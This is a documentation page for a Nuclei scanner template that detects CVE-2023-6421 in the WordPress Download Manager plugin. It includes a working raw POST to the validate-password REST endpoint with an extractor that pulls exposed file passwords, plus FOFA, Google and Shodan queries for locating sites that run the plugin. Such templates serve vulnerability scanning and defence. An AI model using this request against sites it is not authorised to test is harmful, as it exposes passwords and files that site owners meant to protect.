Skip to content
Nuclei Templates

WordPress Download Manager - File Password Exposure

ID: CVE-2023-6421

Severity: medium

Author: ritikchaddha

Tags: cve,cve2023,wp,wordpress,wp-plugin,exposure,download-manager

Description

Section titled “Description”

The WordPress Download Manager plugin contains a vulnerability that allows attackers to obtain passwords for password-protected downloads by sending a specially crafted request to the validate-password API endpoint.

YAML Source

Section titled “YAML Source”
id: CVE-2023-6421


info:
  name: WordPress Download Manager - File Password Exposure
  author: ritikchaddha
  severity: medium
  description: |
    The WordPress Download Manager plugin contains a vulnerability that allows attackers to obtain passwords for password-protected downloads by sending a specially crafted request to the validate-password API endpoint.
  remediation: |
    Update the WordPress Download Manager plugin to the latest version.
  reference:
    - https://wpscan.com/vulnerability/244c7c00-fc8d-4a73-bbe0-7865c621d410/
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
    cvss-score: 5.3
    cve-id: CVE-2023-6421
    cwe-id: CWE-200
  metadata:
    verified: true
    max-request: 1
    fofa-query: body="wp-content/plugins/download-manager/"
    google-query: inurl:"/wp-content/plugins/download-manager/"
    shodan-query: html:"wp-content/plugins/download-manager/"
  tags: cve,cve2023,wp,wordpress,wp-plugin,exposure,download-manager


http:
  - raw:
      - |
        POST /index.php?rest_route=/wpdm/validate-password  HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded


        __wpdm_ID={{id}}&dataType=json&execute=wpdm_getlink&action=wpdm_ajax_call&password=123322
 # pass the password protected file id in the 'id' parameter `-V id=123`


    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '"success"'
          - 'op":"'
          - 'Wrong Password'
        condition: and


      - type: word
        part: header
        words:
          - "application/json"


      - type: status
        status:
          - 200


    extractors:
      - type: json
        name: password
        json:
          - ".op"
# digest: 490a0046304402205c3e1afc387cac7c57fc0a94ec60905126f96a25f5f9d833b6937733b2cff013022013233db09c3d48515e2c7db4923441a4bb4fb8852b6aa40b73dc18b9bc968e54:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2023/CVE-2023-6421.yaml"

View on Github